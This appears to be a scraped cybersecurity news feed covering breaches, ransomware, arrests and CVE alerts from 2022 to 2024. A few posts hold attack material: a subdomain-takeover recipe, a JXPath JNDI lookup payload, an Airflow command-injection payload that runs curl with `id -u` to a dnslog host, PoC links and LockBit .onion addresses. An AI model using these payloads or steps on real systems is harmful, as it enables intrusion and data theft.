Today Cyber News

28/04/2024

🙁 5.5 million hacking attempts: WP Automatic plugin became a burden for 30,000 WordPress sites

Cybercriminals began to exploit a critical vulnerability in the WP Automatic plugin for👩‍💻 WordPress .

This allows you to create accounts with administrative privileges and install backdoors for long-term access.

Installed on over 30,000 sites, the WP Automatic plugin allows administrators to automate the import of content from various sources for publishing on a WordPress site.

Vulnerability💉 SQL injection CVE-2024-27956 Affects WP Automatic versions prior to 3.9.2.0 . The bug was made public on March 13 by researchers at PatchStack .

09/02/2024

⚠️ Akira, LockBit actively searching for vulnerable Cisco ASA devices.

Akira and Lockbit ransomware groups are trying to breach Cisco ASA SSL VPN devices by exploiting several older vulnerabilities, security researcher Kevin Beaumont is warning.

31/01/2024

⚠️ Interview with Hacker behind the Massive Indonesia Railway Data Breach: User Data on the Risk!

https://todaycybernews.com/index.php/2024/01/31/breaking-exclusive-interview-with-notorious-hacker-behind-pt-kereta-breach-millions-of-users-data-at-risk/

Interview with Hacker behind the Massive Indonesia Railway Data Breach: User Data on the Risk!By Today Cyber News / January 31, 2024 Big trouble in Jakarta! The mighty railway company, Kereta Api Indonesia (KAI), has been attacked by a notorious hacking group called STROMOUS.We attempted to reach ou...

26/01/2024

Microsoft Teams outage causes connection issues, message delays: Microsoft is investigating an ongoing and widespread outage impacting the users of its Teams communication platform and causing connectivity issues, login problems, and message delays.

26/01/2024

☠ Australian Man Arrested for Money Laundering in Historic Dark Web Drug Bust.

NSW Police Seize $1 Million in Bitcoin and Luxury Items, Uncover Dark Web Drug Network

Read More
https://todaycybernews.com/index.php/2024/01/26/australian-man-arrested-for-money-laundering-in-historic-dark-web-drug-bust/

Australian Man Arrested for Money Laundering in Historic Dark Web Drug Bust.By teamhash.in / January 26, 2024 New South Wales Police Seize $1 Million in Bitcoin and Luxury Items, Uncover Dark Web Drug Network In a landmark operation, an Australian man has been apprehended by the New South Wales poli...

18/01/2024

🌟Load Balancer Takeover🌟

Step 1: Identify .trafficmanager.net subdomains. 🕵️‍♂️

Step 2: Use your Azure subscription to access the Traffic Manager profile. 🌐

Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. 🛠️

Step 4: Add an endpoint for redirection to your desired site. 🔄

14/01/2024

Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations

PoC: https://github.com/UlyssesSaicha/CVE-2023-6875
Blog: https://www.wordfence.com/blog/2024/01/type-juggling-leads-to-two-vulnerabilities-in-post-smtp-mailer-wordpress-plugin/
Security Advisory: https://nvd.nist.gov/vuln/detail/CVE-2023-6875

23/11/2023

🚨 Alert: Pakistan Police hit by a major security breach!
🕵️‍♂️ Sensitive info exposed includes :

Name
Daughter
Contact No.
Courier Address
⚠️ Address Of Placement.

🔒

07/11/2023

This is how Deepfake videos are being created.
No one can differentiate between Rashmika Mandana and the original video of Zara Patel, a British-Indian girl on Instagram.

Deepfake, a portmanteau of "deep learning" and "fake", is an artificial intelligence-based human image synthesis technique. It is used to combine and superimpose existing images and videos onto source images or videos. Deepfakes may be used to create fake celebrity p**nographic videos , political agenda, narrative or revenge p**n..

"A lot of people didn’t even realize this technology existed, much less that it could be misused or weaponized"

PS: This is an example of Deepfake video trending on social media, for awareness purposes. If any impersonation or privacy violation then report on cybercrime.gov.in

Video source: sandeepnirvan
**n

28/10/2023

Oh-Auth - Abusing OAuth to take over millions of accounts

Hackers could take over millions of accounts on Grammarly, Vidio and Bukalapak. The issue was fixed but users at other websites could still be at risk.

Read More
https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts

10/07/2023

This is what AI can do to a single picture today. Parents - Think before you post.

01/02/2023

OSINT Attack Surface Diagrams

Map for OSINT-researchers, which reveals the main vectors of data search in each direction.

https://www.osintdojo.com/diagrams/main

01/02/2023

CVE-2023-23924: Critical-Severity RCE Flaw Found in Popular Dompdf Library.

https://github.com/advisories/GHSA-3cw5-7cxw-v5qg

Follow Today Cyber News

29/01/2023

Exploits Explained: 5 unusual authentication bypass techniques.
( 1/2 )

#1 – Refresh Token Endpoint Misconfiguration.

#2 – Improper SSO Configuration.

#3 – CMS Based Access Problems.

#4 – Usage of Example JWT Tokens.

#5 – Changing Authentication Type to Null.

Read:- https://twitter.com/TodayCyberNews/status/1619696305353392129?t=QllMM2kWHgEGJg6EMSyrbA&s=19

29/01/2023

📝Source code disclosure in PHP Development Server

24/01/2023

Microsoft has warned customers to fix two Active Directory domain service privilege escalation vulnerabilities CVE-2021-42287 and CVE-2021-42278, which together allow attackers to easily take over Windows domains.

24/01/2023

Players are advised not to enter GTA Online because of a dangerous bug. { 1/3 }

Players of the PC version of (GTA) Online are sounding the alarm: a vulnerability has been discovered in the game that can lead to loss of game progress,

theft of game money, ban and other unpleasant consequences. Modders warn that a little more and the exploit for this problem will allow you to achieve remote code ex*****on through GTA Online, that is, hackers will be able to remotely run malware on computers running the game.

One of the first to report the vulnerability was the Twitter account Tez2, dedicated to the games. According to him, many GTA Online players complain about the loss of progress, bans and kicks that they had to face recently.

https://twitter.com/TodayCyberNews/status/1617751229333143552?t=7WB51WRGqRLFAfE8vhXDrg&s=19

12/01/2023

security

cheatsheet.haax.fr

23/12/2022

Citymobil ( ) leaked 4,149 passport photos of their taxi drivers. All the photos are in the public domain on their website - an unknown person downloaded them and posted them in even more general access.

30/11/2022

Apache Commons Jxpath (CVE-2022-41852)

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj")");

PoC:
https://github.com/Warxim/CVE-2022-41852

Research:
https://hackinglab.cz/en/blog/remote-code-ex*****on-in-jxpath-library-cve-2022-41852/

30/11/2022

"FILE SHARE" & "PRIVATE NOTE" Web

File - http://lockbitfile2tcudkcqqt2ve6btssyvqwlizbpv5vz337lslmhff2uad[.]onion

Note - http://lockbitnotexk2vnf2q2zwjefsl3hjsnk4u74vq4chxrqpjclfydk4ad[.]onion

18/11/2022

💨 Apache Airflow RCE

Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands.

PoC:
1. Active example_bash_operator at DAGs
2. Run ID parameter
{"test":"\";curl `id -u`.###.dnslog.cn;\""}

18/11/2022

Leader of cybercriminal group Zeus arrested in Switzerland

- In October, one of the leaders of the well-known cybercriminal group JabberZeus under the pseudonym "Tank" was arrested in Geneva. Vyacheslav Igorevich Penchukov, 40, is currently awaiting extradition to the US, although he can still appeal the FOJ's decision.

Penchukov was charged for the first time in 2012. He was accused of being involved in a conspiracy to steal millions of dollars using bank accounts, passwords, PINs and other sensitive information stolen with Zeus malware.

“Penchukov ran stolen bank accounts and money mules that transferred money from victims’ accounts to cybercriminals’ accounts.

17/11/2022

💣 ProxyNotShell PoC

ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Ex*****on (CVE-2022-41082) when PowerShell is available on the Exchange Server.

Research:
https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-ex*****on-in-exchange-powershell-backend

Nmap Checker:
https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse

PoC:
https://github.com/testanull/ProxyNotShell-PoC

UPD:
PoC for Python3

09/11/2022